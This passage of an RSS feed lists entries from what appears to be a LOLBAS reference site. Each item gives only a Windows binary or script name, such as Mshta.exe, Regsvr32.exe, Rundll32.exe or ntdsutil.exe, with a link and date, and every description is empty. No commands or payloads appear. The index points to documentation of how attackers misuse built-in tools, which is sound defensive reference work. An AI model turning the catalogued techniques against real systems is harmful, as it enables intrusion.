15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mftrace/</guid><description/></item><item><title>Microsoft.NodejsTools.PressAnyKey.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/microsoft-nodejstools-pressanykey/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/microsoft-nodejstools-pressanykey/</guid><description/></item><item><title>Microsoft.Workflow.Compiler.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/microsoft-workflow-compiler/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/microsoft-workflow-compiler/</guid><description/></item><item><title>Mmc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mmc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mmc/</guid><description/></item><item><title>Mofcomp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mofcomp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mofcomp/</guid><description/></item><item><title>MpCmdRun.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mpcmdrun/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mpcmdrun/</guid><description/></item><item><title>Mpiexec.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mpiexec/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mpiexec/</guid><description/></item><item><title>MSAccess.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msaccess/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msaccess/</guid><description/></item><item><title>Msbuild.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msbuild/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msbuild/</guid><description/></item><item><title>Msconfig.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msconfig/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msconfig/</guid><description/></item><item><title>Mscopilot_proxy.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mscopilot-proxy/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mscopilot-proxy/</guid><description/></item><item><title>Mscopilot.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mscopilot/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mscopilot/</guid><description/></item><item><title>Msdeploy.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msdeploy/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msdeploy/</guid><description/></item><item><title>Msdt.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msdt/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msdt/</guid><description/></item><item><title>msedge_proxy.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msedge-proxy/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msedge-proxy/</guid><description/></item><item><title>Msedge.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msedge/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msedge/</guid><description/></item><item><title>msedgewebview2.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msedgewebview2/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msedgewebview2/</guid><description/></item><item><title>Mshta.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mshta/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mshta/</guid><description/></item><item><title>Mshtml.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/mshtml/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mshtml/</guid><description/></item><item><title>Msiexec.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msiexec/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msiexec/</guid><description/></item><item><title>MsoHtmEd.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msohtmed/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msohtmed/</guid><description/></item><item><title>msoxmled.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msoxmled/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msoxmled/</guid><description/></item><item><title>Mspub.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/mspub/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/mspub/</guid><description/></item><item><title>msxsl.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/msxsl/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/msxsl/</guid><description/></item><item><title>Netsh.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/netsh/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/netsh/</guid><description/></item><item><title>Ngen.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ngen/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ngen/</guid><description/></item><item><title>Nmcap.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/nmcap/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/nmcap/</guid><description/></item><item><title>ntdsutil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ntdsutil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ntdsutil/</guid><description/></item><item><title>Ntsd.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ntsd/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ntsd/</guid><description/></item><item><title>odbcad32.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/odbcad32/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/odbcad32/</guid><description/></item><item><title>Odbcconf.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/odbcconf/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/odbcconf/</guid><description/></item><item><title>OfflineScannerShell.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/offlinescannershell/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/offlinescannershell/</guid><description/></item><item><title>OneDriveStandaloneUpdater.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/onedrivestandaloneupdater/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/onedrivestandaloneupdater/</guid><description/></item><item><title>OpenConsole.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/openconsole/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/openconsole/</guid><description/></item><item><title>Outlook.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/outlook/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/outlook/</guid><description/></item><item><title>Pcalua.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/pcalua/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pcalua/</guid><description/></item><item><title>Pcwrun.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/pcwrun/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pcwrun/</guid><description/></item><item><title>Pcwutl.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/pcwutl/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pcwutl/</guid><description/></item><item><title>Pester.bat</title><link>https://bokkapig.pages.dev/refs/lolbas/pester/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pester/</guid><description/></item><item><title>PhotoViewer.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/photoviewer/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/photoviewer/</guid><description/></item><item><title>Pixtool.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/pixtool/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pixtool/</guid><description/></item><item><title>Pktmon.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/pktmon/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pktmon/</guid><description/></item><item><title>Pnputil.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/pnputil/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pnputil/</guid><description/></item><item><title>Powerpnt.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/powerpnt/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/powerpnt/</guid><description/></item><item><title>Powershell.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/powershell/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/powershell/</guid><description/></item><item><title>Presentationhost.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/presentationhost/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/presentationhost/</guid><description/></item><item><title>Print.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/print/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/print/</guid><description/></item><item><title>PrintBrm.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/printbrm/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/printbrm/</guid><description/></item><item><title>Procdump.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/procdump/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/procdump/</guid><description/></item><item><title>ProtocolHandler.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/protocolhandler/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/protocolhandler/</guid><description/></item><item><title>Provlaunch.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/provlaunch/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/provlaunch/</guid><description/></item><item><title>Psr.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/psr/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/psr/</guid><description/></item><item><title>Pubprn.vbs</title><link>https://bokkapig.pages.dev/refs/lolbas/pubprn/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/pubprn/</guid><description/></item><item><title>Query.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/query/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/query/</guid><description/></item><item><title>Rasautou.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/rasautou/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/rasautou/</guid><description/></item><item><title>rcsi.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/rcsi/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/rcsi/</guid><description/></item><item><title>rdrleakdiag.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/rdrleakdiag/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/rdrleakdiag/</guid><description/></item><item><title>Reg.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/reg/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/reg/</guid><description/></item><item><title>Regasm.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/regasm/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/regasm/</guid><description/></item><item><title>Regedit.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/regedit/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/regedit/</guid><description/></item><item><title>Regini.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/regini/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/regini/</guid><description/></item><item><title>Register-cimprovider.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/register-cimprovider/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/register-cimprovider/</guid><description/></item><item><title>Regsvcs.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/regsvcs/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/regsvcs/</guid><description/></item><item><title>Regsvr32.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/regsvr32/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/regsvr32/</guid><description/></item><item><title>Remote.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/remote/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/remote/</guid><description/></item><item><title>Replace.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/replace/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/replace/</guid><description/></item><item><title>Reset.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/reset/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/reset/</guid><description/></item><item><title>Rpcping.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/rpcping/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/rpcping/</guid><description/></item><item><title>Rundll32.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/rundll32/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/rundll32/</guid><description/></item><item><title>Runexehelper.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/runexehelper/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/runexehelper/</guid><description/></item><item><title>Runonce.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/runonce/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/runonce/</guid><description/></item><item><title>Runscripthelper.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/runscripthelper/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/runscripthelper/</guid><description/></item><item><title>Sc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/sc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/sc/</guid><description/></item><item><title>Schtasks.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/schtasks/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/schtasks/</guid><description/></item><item><title>scp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/scp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/scp/</guid><description/></item><item><title>Scriptrunner.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/scriptrunner/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/scriptrunner/</guid><description/></item><item><title>Scrobj.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/scrobj/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/scrobj/</guid><description/></item><item><title>Setres.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/setres/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/setres/</guid><description/></item><item><title>SettingSyncHost.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/settingsynchost/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/settingsynchost/</guid><description/></item><item><title>Setupapi.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/setupapi/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/setupapi/</guid><description/></item><item><title>setupugc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/setupugc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/setupugc/</guid><description/></item><item><title>Sftp.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/sftp/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/sftp/</guid><description/></item><item><title>Shdocvw.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/shdocvw/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/shdocvw/</guid><description/></item><item><title>Shell32.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/shell32/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/shell32/</guid><description/></item><item><title>Shimgvw.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/shimgvw/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/shimgvw/</guid><description/></item><item><title>Sigverif.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/sigverif/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/sigverif/</guid><description/></item><item><title>Sqldumper.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/sqldumper/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/sqldumper/</guid><description/></item><item><title>Sqlps.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/sqlps/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/sqlps/</guid><description/></item><item><title>SQLToolsPS.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/sqltoolsps/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/sqltoolsps/</guid><description/></item><item><title>Squirrel.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/squirrel/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/squirrel/</guid><description/></item><item><title>ssh.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ssh/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ssh/</guid><description/></item><item><title>Stordiag.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/stordiag/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/stordiag/</guid><description/></item><item><title>SyncAppvPublishingServer.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/syncappvpublishingserver/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/syncappvpublishingserver/</guid><description/></item><item><title>Syncappvpublishingserver.vbs</title><link>https://bokkapig.pages.dev/refs/lolbas/syncappvpublishingserver-2/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/syncappvpublishingserver-2/</guid><description/></item><item><title>Syssetup.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/syssetup/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/syssetup/</guid><description/></item><item><title>Tar.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/tar/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/tar/</guid><description/></item><item><title>te.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/te/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/te/</guid><description/></item><item><title>Teams.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/teams/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/teams/</guid><description/></item><item><title>TestWindowRemoteAgent.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/testwindowremoteagent/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/testwindowremoteagent/</guid><description/></item><item><title>Tracker.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/tracker/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/tracker/</guid><description/></item><item><title>Ttdinject.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/ttdinject/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/ttdinject/</guid><description/></item><item><title>Tttracer.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/tttracer/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/tttracer/</guid><description/></item><item><title>Unregmp2.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/unregmp2/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/unregmp2/</guid><description/></item><item><title>Update.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/update/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/update/</guid><description/></item><item><title>Url.dll</title><link>https://bokkapig.pages.dev/refs/lolbas/url/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/url/</guid><description/></item><item><title>UtilityFunctions.ps1</title><link>https://bokkapig.pages.dev/refs/lolbas/utilityfunctions/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/utilityfunctions/</guid><description/></item><item><title>vbc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vbc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vbc/</guid><description/></item><item><title>Verclsid.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/verclsid/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/verclsid/</guid><description/></item><item><title>Visio.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/visio/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/visio/</guid><description/></item><item><title>VisualUiaVerifyNative.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/visualuiaverifynative/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/visualuiaverifynative/</guid><description/></item><item><title>VSDiagnostics.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vsdiagnostics/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vsdiagnostics/</guid><description/></item><item><title>Vshadow.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vshadow/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vshadow/</guid><description/></item><item><title>VSIISExeLauncher.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vsiisexelauncher/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vsiisexelauncher/</guid><description/></item><item><title>vsjitdebugger.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vsjitdebugger/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vsjitdebugger/</guid><description/></item><item><title>VSLaunchBrowser.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vslaunchbrowser/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vslaunchbrowser/</guid><description/></item><item><title>vsls-agent.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vsls-agent/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vsls-agent/</guid><description/></item><item><title>vstest.console.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/vstest-console/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/vstest-console/</guid><description/></item><item><title>Wab.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wab/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wab/</guid><description/></item><item><title>wbadmin.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wbadmin/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wbadmin/</guid><description/></item><item><title>wbemtest.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wbemtest/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wbemtest/</guid><description/></item><item><title>Wfc.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wfc/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wfc/</guid><description/></item><item><title>WFMFormat.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/wfmformat/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/wfmformat/</guid><description/></item><item><title>WinDbg.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/windbg/</link><pubDate>Fri, 31 Jul 2026 15:59:39 -0400</pubDate><guid>https://bokkapig.pages.dev/refs/lolbas/windbg/</guid><description/></item><item><title>winfile.exe</title><link>https://bokkapig.pages.dev/refs/lolbas/winfile/</link><pubDate>Fri, 31 Jul 2026 15:59:39 